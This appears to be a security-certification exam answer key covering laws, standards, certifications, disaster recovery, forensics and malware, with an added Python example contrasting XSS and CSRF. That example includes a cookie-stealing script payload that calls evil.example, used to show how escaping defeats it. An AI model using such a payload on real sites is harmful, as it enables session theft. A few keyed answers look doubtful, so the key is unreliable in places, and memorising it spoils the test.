Final Exam


True or False? During a simulation test of a contingency plan, you must shut down the original system at the primary site for the duration.

False

True or False? Hijacking refers to the use of social engineering to obtain access credentials, such as usernames and passwords.

False

True or False? Mandatory vacations minimize risk by rotating employees among various systems or duties.

False

True or False? Operating systems remove data when a file is deleted.

False

True or False? Privacy is the process used to keep data private.

False

True or False? Regulatory compliance means complying with an organization's own policies, audits, culture, and standards.

False

True or False? Symantec offers vendor-neutral certifications as well as certifications for its product lines.

False

True or False? System infectors are viruses that attack document files containing embedded macro programming capabilities.

False

True or False? Testimonial evidence is often the most important evidence in court because it provides relevance for other types of evidence.

False

True or False? The (ISC)2 Certified Secure Software Lifecycle Professional (CSSLP) credential measures the knowledge and skills necessary for professionals involved in the process of authorizing and maintaining information systems.

False

True or False? The Family Educational Rights and Privacy Act (FERPA) requires that specific information security controls be implemented to protect student records.

False

True or False? The Gramm-Leach-Bliley Act (GLBA) applies to the financial activities of both consumers and privately held companies.

False

True or False? The Health Insurance Portability and Accountability Act (HIPAA) applies only to current mental and physical health information and payments.

False

True or False? The Health Insurance Portability and Accountability Act (HIPAA) replaced the Health Information Technology for Economic and Clinical Health (HITECH) Act.

False

True or False? The ISACA Certified in Risk and Information Systems Control (CRISC) certification targets security professionals who ensure that their organization satisfies IT governance requirements.

False

True or False? The International Electrotechnical Commission (IEC) develops standards, which cover both wired and wireless communication technologies, that are commonly adopted by member countries in the European Union (EU).

False

True or False? The International Organization for Standardization (ISO) publishes the IEEE 802 local area network (LAN)/metropolitan area network (MAN) standards family.

False

True or False? The International Standard Book Number (ISBN) is an Institute of Electrical and Electronics Engineers (IEEE) standard.

False

True or False? The Internet Engineering Task Force (IETF) request for comments (RFC) development process is conducted solely by scientists on the Internet Architecture Board (IAB).

False

True or False? The National Institute of Standards and Technology (NIST) is a nongovernmental organization whose goal is to develop and publish international standards.

False

True or False? The federal agencies that oversee Gramm-Leach-Bliley Act (GLBA) compliance may not act against the financial institutions that they regulate when those institutions violate GLBA.

False

True or False? The main goal of the California Consumer Privacy Act (CCPA) is to prevent details of data breaches from being shared with the public.

False

True or False? The main goal of the Gramm-Leach-Bliley Act (GLBA) is to protect investors from financial fraud.

False

True or False? The process of remediation makes sure all personnel are aware of and comply with an organization's policies.

False

True or False? The term "data owner" refers to the person or group that manages an IT infrastructure.

False

True or False? The waterfall software development model works well in very dynamic environments where requirements change and are often revisited.

False

True or False? Under the Payment Card Industry Data Security Standard (PCI DSS), the rules with which an organization must comply depend on which types of payment cards they accept.

False

True or False? When outsourcing operations to a cloud service provider, the client is responsible for determining the best fault tolerance implementations to meet the service level-agreement (SLA) availability requirements.

False

True or False? Worms operate by encrypting important files or even the entire storage device and making them inaccessible.

False

Antonio is responsible for tuning his organization's intrusion detection system. He notices that the system reports an intrusion alert each time that an administrator connects to a server using Secure Shell (SSH). What type of error is occurring? Remote administration error False positive error Clipping error False negative error

False positive error

Which of the following agencies is not involved in the Gramm-Leach-Bliley Act (GLBA) oversight process? Securities and Exchange Commission (SEC) Federal Trade Commission (FTC) Federal Deposit Insurance Corporation (FDIC) Federal Communications Commission (FCC)

Federal Communications Commission (FCC)

Erin is a system administrator for a U.S. federal government agency. What law contains guidance on how she may operate a federal information system? Family Educational Rights and Privacy Act (FERPA) Federal Information Security Management Act (FISMA) Gramm-Leach-Bliley Act (GLBA) Sarbanes-Oxley Act (SOX)

Federal Information Security Management Act (FISMA)

True or False? Classification scope determines what data to classify; classification process determines how to handle classified data.

True

True or False? Spyware does not use cookies.

False

True or False? Committee of Sponsoring Organizations (COSO) is a set of best practices for IT management.

False

True or False? CompTIA Security+ is an expert-level security certification.

False

True or False? Cyberterrorism is the use of online media and assets to harass individuals.

False

True or False? Change control is the management of changes to the configuration of a system.

True

What is the purpose of a disaster recovery plan (DRP)? To set the value of each business process or resource as it relates to how the entire organization operates To identify the critical needs to develop a business recovery plan To set the order or priority for restoring an organization's functions after a disruption To enable an organization to make critical decisions ahead of time so personnel can manage and review decisions without the urgency of an actual disaster

To enable an organization to make critical decisions ahead of time so personnel can manage and review decisions without the urgency of an actual disaster (If these plans are not ready in advance, security professionals and managers will have to make best-guess decisions under huge pressure.)

Which of the following is not true of requests for comments (RFCs)? Only some RFCs specify standards. RFCs may be modified. RFCs may originate with organizations other than the Internet Engineering Task Force (IETF). A Proposed Standard is the initial official stage of an RFC that defines a formal standard.

RFCs may be modified. (RFCs never change once published. Any change to an RFC gets a new number and becomes a new RFC that updates or obsoletes the original.)

What file type is least likely to be impacted by a file infector virus? .exe .docx .com .dll

.docx

Susan performs a full backup of her server every Sunday at 1:00 a.m. and differential backups on Mondays through Fridays at 1:00 a.m. Her server fails at 9:00 a.m. on Wednesday. How many backups does Susan need to restore? 1 2 3 4

2 (The Sunday full backup plus Wednesday's 1:00 a.m. differential, which holds every change made since the full backup; Monday's and Tuesday's differentials are superseded by it.)

How many domains of knowledge are covered by the Certified Information Systems Security Professional (CISSP) exam? 7 8 9 10

8

True or False? Configuration changes can be made at any time during a system life cycle, and no process is required.

False

Devaki is a network engineer. She is diagnosing an issue with a small business customer's wireless local area network (WLAN). She knows the Institute of Electrical and Electronics Engineers (IEEE) has created the standards involved in various network technologies. While WLAN standards cover a wide array of subsets, which general standard does she need to consult that addresses all WLANs? 802.3 802.11 802.16 802.18

802.11

Mark is considering outsourcing security functions to a third-party service provider. What benefit is he most likely to achieve? Higher degree of privacy Access to a higher level of expertise Developing in-house talent Building internal knowledge

Access to a higher level of expertise

Hajar is responsible for keeping her banking institution's servers operating 24/7/365. Her recovery strategy is to have fully redundant or duplicate operations and synchronized data and to operate the site continuously. Which strategy has she selected? Alternate processing center or mirrored site Hot site Mobile site Warm site

Alternate processing center or mirrored site

Under the Federal Information Security Management Act (FISMA) of 2002, which of the following broadens the scope of FISMA beyond a federal agency and is important because IT systems and functions are often outsourced? The Office of Management and Budget (OMB) is responsible for FISMA compliance. An agency must protect the IT systems that support its operations even if another agency or contractor owns the IT systems. FISMA requires each federal agency to create an agency-wide information security program. Agencies must test and evaluate the security program at least annually and test IT systems with greater risk more often.

An agency must protect the IT systems that support its operations even if another agency or contractor owns the IT systems.

What is not a privacy principle created by the Organisation for Economic Co-operation and Development (OECD)? An organization should collect only what it needs. An organization should share its information. An organization should keep its information up to date. An organization should properly destroy its information when it is no longer needed.

An organization should share its information.

In the Open Systems Interconnection (OSI) Reference Model, which layer has the user interface that displays information to the user? Application Presentation Session Transport

Application

Mary is designing a software component that will function at the Presentation Layer of the Open Systems Interconnection (OSI) Reference Model. What other two layers of the model will her component need to interact with? Network and Session Session and Transport Application and Session Application and Transport

Application and Session

In what area does the Internet Architecture Board (IAB) provide oversight on behalf of the Internet Engineering Task Force (IETF)? Architecture for Internet protocols and procedures Strengthening the U.S. marketplace within the global economy Developing alternate methods used to document operational specifications Subject matter expertise on routing and switching

Architecture for Internet protocols and procedures

Jiang is pursuing a career in information security. He wants to eventually achieve the (ISC)2 Certified Information Systems Security Professional (CISSP) certification but does not have the required experience. If he passes the CISSP exam now, which credential will Jiang get? CISSP-ISSAP Systems Security Certified Practitioner (SSCP) Certified Cloud Security Professional (CCSP) Associate of (ISC)2

Associate of (ISC)2

In an accreditation process, who has the authority to approve a system for implementation? Certifier Authorizing official (AO) System owner System administrator

Authorizing official (AO)

Lin is creating a template for the configuration of Windows servers in her organization. The configuration includes the basic security settings that should apply to all systems. What type of document should she create? Baseline Policy Guideline Procedure

Baseline

Takako is a security engineer for her company's IT department. She has been tasked with developing a security monitoring system for the company's infrastructure to determine when any network activity occurs outside the norm. What essential technique does she start with? Alarms Baselines Covert acts Intrusion detection system (IDS)

Baselines

Tonya would like to protect her users and the network when users browse to known dangerous sites. She plans to maintain a list of those sites and drop messages from those websites. What type of approach is Tonya advocating? Blacklisting Change detection Integrity checking Whitelisting

Blacklisting

Joe is the Chief Executive Officer (CEO) of a company that handles medical billing for several regional hospital systems. How would Joe's company be classified under the Health Insurance Portability and Accountability Act (HIPAA)? Covered entity as a health plan Covered entity as a health care clearinghouse Covered entity as a provider Business associate of a covered entity

Business associate of a covered entity

Hajar has been an (ISC)2 Certified Information Systems Security Professional (CISSP) for 10 years. She would like to earn an advanced certification that demonstrates her ability in systems security engineering. Which of the following CISSP concentrations would meet Hajar's needs? CISSP-ISASP CISSP-ISSEP CISSP-ISSMP CISSP-ISSAP

CISSP-ISSEP

Arturo is leading a project to commission a new information system that will be used by a U.S. federal government agency. The agency uses the risk management framework (RMF) approach for Federal Information Security Management Act (FISMA) compliance. He is working with his team to assess and document agency IT systems based on risk. What step of the risk management framework is Arturo completing? Implement security controls in IT systems Assess security controls for effectiveness Categorize information systems Continuously monitor security controls

Categorize information systems

Richard would like to earn a certification that demonstrates his ability to manage enterprise security programs. What certification would be most appropriate for Richard? Certified Information Security Manager (CISM) Certified Information Systems Auditor (CISA) Certified in the Governance of Enterprise IT (CGEIT) Certified in Risk and Information Systems Control (CRISC)

Certified Information Security Manager (CISM)

Jim is an experienced security professional who recently accepted a position in an organization that uses Check Point firewalls. What certification can Jim earn to demonstrate his ability to administer these devices? Certified Information Systems Security Professional (CISSP) Cisco Certified Internetwork Expert (CCIE) Security+ Check Point Certified Security Administrator (CCSA)

Check Point Certified Security Administrator (CCSA)

Betty visits a local library with her young children. She notices that someone using a computer terminal in the library is visiting pornographic websites. What law requires that the library filter offensive web content for minors? Children's Online Privacy Protection Act (COPPA) Sarbanes-Oxley Act (SOX) Family Educational Rights and Privacy Act (FERPA) Children's Internet Protection Act (CIPA)

Children's Internet Protection Act (CIPA)

Oscar is a network engineer. He is responsible for the networks and security protections, such as firewalls, in his local government agency. He is beginning a professional development journey and trying to determine an entry-level or associate-level security certification that is a good match with his current knowledge and skills. Which certification should he pursue? Cisco Certified Network Associate (CCNA) Juniper Networks Certified Internet Professional (JNCIP)-Enterprise Administration of Symantec Security Analytics Check Point Certified Security Administrator (CCSA)

Cisco Certified Network Associate (CCNA)

Which method of fault tolerance connects two or more computers to act like a single computer in a highly coordinated manner? Redundant Array of Inexpensive Disks (RAID) Clustering Load balancing Outsourcing to the cloud

Clustering

Rylie is a newly hired cybersecurity expert for a government agency. Rylie used to work in the private sector. She has discovered that, whereas private sector companies often had confusing hierarchies for data classification, the government's classifications are well known and standardized. As part of her training, she is researching data that requires special authorization beyond normal classification. What is this type of data called? Compartmentalized Assured Public Exclusive

Compartmentalized

Which principle of effective digital forensic investigations helps to ensure data in memory is not lost? Minimize original data handling Enforce the rules of evidence Do not exceed your knowledge Consider data volatility

Consider data volatility

Which of the following should you avoid during a disaster and recovery? Continue normal processes, such as separation of duties or spending limits If a number of systems are down, provide additional guidance or support to users Combine services that were on different hardware platforms onto common servers to speed up recovery While running at the alternate site, continue to make backups of data and systems

Continue normal processes, such as separation of duties or spending limits (It is better to suspend normal processes, such as separation of duties or spending limits. Compensate with additional controls or by additional auditing. The disaster recovery plan (DRP) should give added privileges or spending authority to certain people or for certain tasks.)

Donnelly is an IT specialist. He is in charge of the server and network appliances inventory. The infrastructure roadmap calls for a network systems reconfiguration in the next six months. Adina, the security expert, asks Donnelly to prepare a standardized list of all current and proposed equipment and then to present it to her in a hardware configuration chart. What does Adina tell Donnelly that the chart should include? Change control management Copies of all software configurations for routers and switches Impact assessment System life cycle

Copies of all software configurations for routers and switches

Maya is creating a computing infrastructure compliant with the Payment Card Industry Data Security Standard (PCI DSS). What type of information is she most likely trying to protect? Health records Credit card information Educational records Trade secrets

Credit card information

Applications represent the most common avenue for users, customers, and attackers to access data, which means you must build the software to enforce the security policy and to ensure compliance with regulations, including the privacy and integrity of both data and system processes. Regardless of the development model, the application must validate all input. Certain attacks can take advantage of weak validation. One such attack provides script code that causes a trusted user who views the input script to send malicious commands to a web server. What is this called? Cross-site scripting (XSS) Cross-site request forgery (XSRF) Distributed denial of service (DDoS) Structured Query Language (SQL) injection

Cross-site request forgery (XSRF)

Larry recently viewed an auction listing on a website. As a result, his computer executed code that popped up a window that asked for his password. What type of attack has Larry likely encountered? Structured Query Language (SQL) injection Command injection Extensible Markup Language (XML) injection Cross-site scripting (XSS)

Cross-site scripting (XSS)
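The two questions above are easy to confuse, so here is the distinction in working code. This is an added example, not part of the original exam page and not code from the textbook it is drawn from: an XSS bug comes from rendering untrusted input into HTML without output encoding, while CSRF comes from accepting a state-changing request without proving the user's own page produced it. Only the standard library is used; the session and form objects are plain dicts standing in for a web framework's, and all function names and sample inputs are constructed for illustration.

```python
"""Stored XSS beside its fix, and a CSRF token check, side by side."""
import html
import hmac
import secrets

# --- Cross-site scripting: untrusted input rendered into HTML -------------

def render_comment_vulnerable(comment: str) -> str:
    """Deliberately unsafe: the attacker's text is interpolated verbatim,
    so '<script>' in a stored comment executes in every viewer's browser."""
    return f"<li class='comment'>{comment}</li>"


def render_comment_safe(comment: str) -> str:
    """Output-encode for the HTML text context before interpolating."""
    return f"<li class='comment'>{html.escape(comment, quote=True)}</li>"


def contains_active_markup(rendered: str) -> bool:
    """Crude check: does the rendered fragment still carry a raw script tag
    or an inline event handler that could only have come from input?"""
    lowered = rendered.lower()
    return any(marker in lowered for marker in ("<script", "onerror=", "onload="))


# --- Cross-site request forgery: a trusted user's browser is made to send a
# state-changing request the user never intended ---------------------------

def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to the server-side session and return it
    so the legitimate form can embed it in a hidden field."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def handle_transfer(session: dict, form: dict) -> str:
    """Process a POST /transfer (assumed endpoint). A form submitted from an
    attacker's page carries the victim's cookies, so the session is valid,
    but the attacker cannot read the token and the request is rejected."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return "403 rejected: missing or invalid CSRF token"
    return f"200 transferred {form['amount']} to {form['to']}"


def demo() -> dict:
    """Run both scenarios on constructed input and return the outcomes."""
    payload = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
    session = {}
    token = issue_csrf_token(session)
    forged = {"amount": "1000", "to": "attacker"}            # no token: cross-site form
    genuine = {"amount": "1000", "to": "attacker", "csrf_token": token}
    return {
        "xss_vulnerable": contains_active_markup(render_comment_vulnerable(payload)),
        "xss_fixed": contains_active_markup(render_comment_safe(payload)),
        "csrf_forged": handle_transfer(session, forged),
        "csrf_genuine": handle_transfer(session, genuine),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Note what each fix does and does not buy you: escaping stops the injected script from running but does nothing about forged requests, and the token stops forged requests but does nothing about injected script. A page needs both, and in practice the token check is complemented by the `SameSite` cookie attribute.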

What program, released in 2013, is an example of ransomware? BitLocker CryptoLocker FileVault CryptoVault

CryptoLocker

Which element is not a core component of the ISO 27002 standard? Risk assessment Cryptography Asset management Access control

Cryptography (This matches the clause list of ISO/IEC 17799:2005 and 27002:2005, which opened with "risk assessment and treatment" and had no cryptography clause. ISO/IEC 27002:2013 added a Cryptography clause, and risk assessment is handled in ISO/IEC 27001 and 27005 rather than as a 27002 control domain, so measured against the current edition the odd one out would be risk assessment.)

Alan withdraws cash from an ATM belonging to Bank X that is coming from his account with Bank Y. What is Alan's relationship with Bank X? Customer Covered entity Nonaffiliated third party Consumer

Consumer (Under GLBA a consumer is an individual who obtains a financial product or service for personal purposes, while a customer is a consumer with a continuing relationship with the institution. Alan has no account with Bank X; a one-time ATM withdrawal makes him a consumer there, and a customer only of Bank Y, which holds his account.)

Alan withdraws cash from an ATM belonging to Bank X that is coming from his account with Bank Y. What is Alan's relationship with Bank Y? Customer Covered entity Nonaffiliated third party Consumer

Customer

Which type of computer crime often involves nation-state attacks by well-funded cybercriminals? Cyberstalking Cyberterrorism Online fraud Identity theft

Cyberterrorism

Juan is an experienced information security professional. He has spent a lot of time evaluating computers for evidence of criminal or malicious activity as well as recovering data. Which Global Information Assurance Certification (GIAC) credential focus area is most likely to have certifications that are a good fit for Juan's skills and knowledge? Management, Legal, and Audit Industrial Control Systems Digital Forensics & Incident Response Cloud Security

Digital Forensics & Incident Response

Which of the following is not true of U.S. Department of Defense/military Directive (DoDD) 8140? DoDD 8140 includes training and certification in cybersecurity to prepare Department of Defense (DoD) personnel to meet the demands of cyberwarfare. DoDD 8140 is more role based than the 8570.01 directive. DoDD 8140 is an operationally focused cybersecurity training framework. DoDD 8140 certifications are unique and will not include commercial certifications.

DoDD 8140 certifications are unique and will not include commercial certifications.

Which type of evidence is stored in a computer's memory, as well as on storage devices as in files, and must be accompanied by documentation that validates the evidence's authenticity? Real Documentary Testimonial Demonstrative

Documentary

Lin is conducting an audit of an identity management system. Which question is not likely to be in the scope of her audit? Does the organization have an effective password policy? Does the firewall properly block unsolicited network connection attempts? Who grants approval for access requests? Is the password policy uniformly enforced?

Does the firewall properly block unsolicited network connection attempts?

Which document is the Internet Engineering Task Force (IETF) request for comments (RFC) second stage, after participants have demonstrated that the standard has been deployed in working environments? Proposed Standard (PS) Draft Standard (DS) Standard (STD) Best Current Practice (BCP)

Draft Standard (DS) (This is the three-level standards track defined in RFC 2026. RFC 6410, published in 2011, reduced the track to two maturity levels, Proposed Standard and Internet Standard, so Draft Standard is no longer assigned to new documents.)

Omar is an infrastructure security professional. After reviewing a set of professional ethics issued by his company, he is learning and adopting ethical boundaries in an attempt to demonstrate them to others. What is this called? Encouraging the adoption of ethical guidelines and standards Informing users through security awareness training Communicating the freedom to access all system resources Understanding common assumptions that lead computer users to unethical behavior

Encouraging the adoption of ethical guidelines and standards

Which technology category would not likely be the subject of a standard published by the International Electrotechnical Commission (IEC)? Semiconductors Solar energy Encryption Consumer appliances

Encryption

Tonya is working with a team of subject matter experts to diagnose a problem with her system. The experts determine that the problem likely resides at the Transport Layer of the Open Systems Interconnection (OSI) model. Which functionality is the most likely suspect? Process-to-process communication End-to-end communication maintenance Routing Signaling

End-to-end communication maintenance (The Transport Layer (Layer 4) provides error-free communications across a network as well as the connections needed by software functions in the Session Layer (Layer 5). In addition, it calls functions in the Network Layer (Layer 3), the next layer down, to send and receive packets that comprise the contents of the network communication.)

Which of the following is least likely to be needed when rebuilding systems that were damaged during a disaster? Updating operating systems and applications with the most current patches Restoring data to the recovery point objective (RPO) Ensuring there are adequate operating system licenses Activating access control rules, directories, and remote access systems to permit users to get on the new systems

Ensuring there are adequate operating system licenses

Which organization creates information security standards that specifically apply within the European Union (EU)? International Telecommunication Union (ITU) American National Standards Institute (ANSI) European Telecommunications Standards Institute (ETSI) Cyber Security Technical Committee (TC CYBER) Institute of Electrical and Electronics Engineers (IEEE)

European Telecommunications Standards Institute (ETSI) Cyber Security Technical Committee (TC CYBER)

Biyu is a network administrator. She is developing the compliance aspect of her company's security policy. Currently, she is focused on the records of actions that the organization's operating system or application software creates. What aspect of compliance is Biyu focusing on? Certification Event logs Professional ethics Remediation

Event logs

True or False? A business impact analysis (BIA) details the steps to recover from a disruption and restore the infrastructure necessary for normal business operations.

False

True or False? A port-scanning tool enables an attacker to escalate privileges on a network server.

False

True or False? A smurf attack tricks users into providing logon information on what appears to be a legitimate website but is in fact a website set up by an attacker to obtain this information.

False

True or False? A website designer seeking guidance on how to incorporate Simple Object Access Protocol (SOAP) and Extensible Markup Language (XML) would most likely consult Internet Engineering Task Force (IETF) requests for comments (RFCs).

False

True or False? All types of disaster recovery sites are available in the cloud.

False

True or False? Change does not create risk for a business.

False

True or False? Clustering comprises multiple disk drives that appear as a single disk drive but actually store multiple copies of data in case a disk drive in the array fails.

False

Bob is preparing to dispose of magnetic media and wishes to destroy the data stored on it. Which method is not a good approach for destroying data? Formatting Degaussing Physical destruction Repeatedly overwriting data

Formatting

Antivirus, firewall, and email use policies belong to what part of a security policy hierarchy? Environment Functional policies in support of organization policy Organizational security policy Supporting mechanisms

Functional policies in support of organization policy

Lin works for a large financial institution. She has been asked to create a written information security program, which must state how the institution collects and uses customer data and must describe the controls used to protect that data. She is also in charge of running the program, conducting a risk assessment to identify risks to customer information, and assessing current safeguards to make sure they are effective, among other tasks. Which of the following is she trying to comply with? Gramm-Leach-Bliley Act (GLBA) Privacy Rule GLBA Safeguards Rule Sarbanes-Oxley Act (SOX) certification requirements Payment Card Industry Data Security Standard (PCI DSS)

GLBA Safeguards Rule (The Safeguards Rule requires a financial institution to create a written information security program, assign someone to run the program, conduct a risk assessment, assess safeguards, and design and implement safeguards to control risks. The rule requires financial institutions to have programs that are a good fit for their size and complexity and are suitable for the sensitivity of the customer data that the institution uses.)

Devaki is a new compliance manager. She is reading about various regulations to determine which ones apply to her industry. What law applies specifically to consumer data that originates in Europe? Health Insurance Portability and Accountability Act (HIPAA) Sarbanes-Oxley Act (SOX) Payment Card Industry Data Security Standard (PCI DSS) General Data Protection Regulation (GDPR)

General Data Protection Regulation (GDPR)

Which of the following is a unit of measure that represents frequency and is expressed as the number of cycles per second? Power Weber Gauss Hertz

Hertz

What type of system is intentionally exposed to attackers in an attempt to lure them out? Honeypot Bastion host Web server Database server

Honeypot

Gary is troubleshooting a security issue on an Ethernet network. He would like to look at the relevant Ethernet standard. What publication should he seek out? NIST 800-53 IEEE 802.3 ANSI X.1199 ISO 17799

IEEE 802.3

Juan comes across documentation from his organization related to several information security initiatives using different standards as their reference. Which International Organization for Standardization (ISO) standard provides current guidance on information security management? ISO 17799 ISO 9000 ISO 27002 ISO 14001

ISO 27002

What is a set of concepts and policies for managing IT infrastructure, development, and operations? The information is published in a series of books, each covering a separate IT management topic. ISO 27002 Control Objectives for Information and Related Technology (COBIT) IT Infrastructure Library (ITIL) National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF)

IT Infrastructure Library (ITIL)

During which step of the incident-handling process does triage take place? Identification Notification Response Recovery and follow-up

Identification

Tim is implementing a set of controls designed to ensure that financial reports, records, and data are accurately maintained. What information security goal(s) is Tim attempting to achieve? Integrity Integrity and availability Availability Confidentiality

Integrity

Fran is interested in learning more about the popular Certified Ethical Hacker (CEH) credential. What organization should she contact? High Tech Crime Network International Council of E-Commerce Consultants (EC-Council) Software Engineering Institute—Carnegie Mellon University The International Society of Forensic Computer Examiners

International Council of E-Commerce Consultants (EC-Council)

Maria is working on the definition and application of the terms gauss, hertz, and weber. Which standards source should she consult? International Electrotechnical Commission (IEC) International Telecommunication Union Telecommunication Sector (ITU-T) World Wide Web Consortium (W3C) Internet Engineering Task Force (IETF)

International Electrotechnical Commission (IEC)

Bill is conducting an analysis of a new IT service. He would like to assess it using the Open Systems Interconnection (OSI) Reference Model and would like to learn more about this framework. What organization should he turn to for the official definition of OSI? Ocean Surveillance Information System (OSIS) International Organization for Standardization (ISO) National Institute of Standards and Technology (NIST) Information Systems Audit and Control Association (ISACA)

International Organization for Standardization (ISO)

Which organization promotes technology issues as an agency of the United Nations? International Telecommunication Union (ITU) Institute of Electrical and Electronics Engineers (IEEE) American National Standards Institute (ANSI) Internet Assigned Numbers Authority (IANA)

International Telecommunication Union (ITU)

Yolanda would like to prevent attackers from using her network as a relay point for a smurf attack. What protocol should she filter? Hypertext Transfer Protocol (HTTP) Transmission Control Protocol (TCP) Internet Control Message Protocol (ICMP) User Datagram Protocol (UDP)

Internet Control Message Protocol (ICMP)

Rodrigo has just received an email at work from an unknown person. The sender claims to have incriminating evidence against Rodrigo and threatens to release it to his employer and his family unless he discloses certain confidential information about his employer's company. Rodrigo does not know that several other people in the organization received the same email. What form of social engineering has occurred? Intimidation Name dropping Appeal for help Phishing

Intimidation

Which of the following is not true of data backup options? A full backup copies everything to backup media. A differential backup starts with making a full backup; successive backups back up changes made since the last full backup. An incremental backup starts with a full backup; successive backups back up only that day's changes. It is faster to create differential weekday backups than incremental backups.

It is faster to create differential weekday backups than incremental backups.

Which term describes a process that requires an organization to preserve and not alter evidence that may be used in court? This process can help ensure that normal data-handling procedures do not contaminate or even delete data that may be needed for a case. Legal hold E-discovery Admissibility Hash function

Legal hold

What is the average time a device will function before it fails? Recovery time objective (RTO) Recovery point objective (RPO) Mean time to failure (MTTF) Mean time between failures (MTBF)

Mean time to failure (MTTF)

Alison is a security professional. A user reports that, after opening an email attachment, every document he saves is in a template format and other Microsoft Word documents will not open. After investigating the issue, Alison determines that the user's Microsoft Office normal.dot template has been damaged, as well as many Word files. What type of virus is the most likely cause? Polymorphic virus Retro virus Cross-platform virus Macro virus

Macro virus

Taylor is a security professional working for a retail company. She is revising the company's policies and procedures to meet Payment Card Industry Data Security Standard (PCI DSS) objectives. One change she has made is to require the use of antivirus software on all systems commonly affected by malware and to keep them regularly updated. Which PCI DSS control objective is she attempting to meet? Build and maintain a secure network Protect cardholder data Maintain a vulnerability management program Implement strong access control measures

Maintain a vulnerability management program

Isabella is a digital forensic specialist. She wants to recover deleted data from a computer disk. The computer is currently running. Which process should she take to do so without accidentally overwriting any deleted data? Copy the contents of the disk drive to an external drive without shutting down the computer Shut down the computer, reboot, and then copy the contents of the disk drive to an external drive Make an image of memory, shut down the computer, attach the disk drive to a forensic lab device, and read the data from the disk Because processes constantly run on computers and request new sectors to store data, it is not possible to recover deleted data without some data being overwritten

Make an image of memory, shut down the computer, attach the disk drive to a forensic lab device, and read the data from the disk

When should an organization's managers have an opportunity to respond to the findings in an audit? Managers should write a report after receiving the final audit report. Managers have the opportunity to respond to a draft copy of the audit report. Auditors then put that response in the final report. Managers should not have an opportunity to respond to audit findings. Managers should write a letter to the Board following receipt of the audit report.

Managers have the opportunity to respond to a draft copy of the audit report. Auditors then put that response in the final report.

Alison retrieved data from a company database containing personal information on customers. When she looks at the Social Security number (SSN) field, she sees values that look like this: "XXX-XX-9142." What has happened to these records? Encryption Truncation Hashing Masking

Masking (Organizations typically implement role-based access control mechanisms in their applications to ensure the confidentiality of sensitive data. Masking is used to "X out" pertinent characters of sensitive data.)

Isabella is an IT security manager for a state agency. The agency can survive for nine hours without a functioning data center. If the power goes out in her data center, Isabella estimates it will take six hours to move data center operations to an alternate site. Which of the following describes how long the agency can survive without a functioning data center? Critical business function (CBF) Maximum tolerable downtime (MTD) Recovery time objective (RTO) Recovery point objective (RPO)

Maximum tolerable downtime (MTD)

Which agreement type is typically less formal than other agreements and expresses areas of common interest? Service-level agreement (SLA) Blanket purchase agreement (BPA) Memorandum of understanding (MOU) Interconnection security agreement (ISA)

Memorandum of understanding (MOU)

Which of the following is not true of mobile devices and forensics? Mobile devices can be volatile and remotely managed. Mobile devices do not need to follow ordinary chain of custody techniques. Although options are available for breaking mobile device access controls, there is no guarantee that you will be able to access the device's data without the owner's cooperation. The process of accessing evidence on a mobile device is similar to that on a normal computer.

Mobile devices do not need to follow ordinary chain of custody techniques.

Arturo discovers a virus on his system that resides only in the computer's memory and not in a file. What type of virus has he discovered? Slow virus Retro virus Cross-platform virus Multipartite virus

Multipartite virus

What U.S. federal government agency is charged with the responsibility of creating information security standards and guidelines for use within the federal government and more broadly across industries? Office of Management and Budget (OMB) Department of Defense (DoD) National Institute of Standards and Technology (NIST) Department of Homeland Security (DHS)

National Institute of Standards and Technology (NIST)

Which of the following is a U.S. federal agency within the Department of Commerce that provides standards for measurement and technology on which nearly all computing devices rely? Institute of Electrical and Electronics Engineers (IEEE) American National Standards Institute (ANSI) World Wide Web Consortium (W3C) National Institute of Standards and Technology (NIST)

National Institute of Standards and Technology (NIST)

Hajar is a network engineer. She is creating a system of access involving clearance and classification based on users and the objects they need in a secure network. She is restricting access to secure objects by users based on least privilege and which of the following? Job rotation Security awareness Need to know Separation of duties

Need to know

In which type of computer crime do cybercriminals engage in activities to either impersonate victims or to convince victims to carry out transactions that benefit the criminals, with a focus on extracting revenue from victims? Cyberstalking Exfiltrating data Online fraud Nonaccess computer crime

Online fraud

Janette is the director of her company's network infrastructure group. She is explaining to the business owners the advantages and disadvantages of outsourcing network security. One consideration she presents is the question of who would be responsible for the data, media, and infrastructure. What consideration is she describing? Adherence to policy Ownership Privacy Risk

Ownership

A computing device does not play which role in a crime? Perpetrator Target Instrument Repository

Perpetrator

During which step of the incident-handling process do you develop a formal communication plan and identify all key stakeholders? Preparation Identification Notification Documentation

Preparation

Marguerite is creating a budget for a software development project. What phase of the system life cycle is she undertaking? Project initiation and planning Functional requirements and definition System design specification Operations and maintenance

Project initiation and planning

Christopher is designing a security policy for his mid-size company. He would like to use an approach that allows a reasonable list of activities but prohibits all other activities. Which level of permission is he planning to use? Promiscuous Permissive Prudent Paranoid

Prudent

What type of organizations are required to comply with the Sarbanes-Oxley Act (SOX)? Nonprofit organizations Publicly traded companies Government agencies Privately held companies

Publicly traded companies

What is the least likely goal of an information security awareness program? Teach users about security objectives Inform users about trends and threats in security Motivate users to comply with security policy Punish users who violate policy

Punish users who violate policy

Which data source comes first in the order of volatility when conducting a forensic investigation? Logs Files on disk Swap and paging files Random access memory (RAM)

Random access memory (RAM)

Which type of evidence is any physical object that you can touch or otherwise directly observe, such as a hard drive? Real Documentary Testimonial Demonstrative

Real

Arturo is an IT manager for a school district. He is planning recovery options for a small data center that supports teacher and classroom activities for 5 of the 21 schools in his district. Many school districts in his state use similar classroom technology. Arturo is looking for a temporary alternate site that would be easy to cut over to and is affordable. Which option is most likely to fit Arturo's needs? Reciprocal agreement with another school district Reciprocal center Contingency carrie

Reciprocal agreement with another school district

During which step of the incident-handling process should a lessons-learned review of the incident be conducted? Notification Response Recovery and follow-up Documentation

Recovery and follow-up

Isabella is an IT security manager for a state agency. The agency can survive for nine hours without a functioning data center. The power goes out in her data center. It takes six hours to move data center operations to an alternate site. Which of the following describes the time it takes for the move? Critical business function (CBF) Mean time to failure (MTTF) Recovery time objective (RTO) Recovery point objective (RPO)

Recovery time objective (RTO)

Karen is a hacker. She wants to access a server and control it remotely. The tool she plans to use is a type of Trojan. What tool will Karen use for this purpose? Ping Simple Network Management Protocol (SNMP) agent Network mapper (Nmap) Remote Access Tool (RAT)

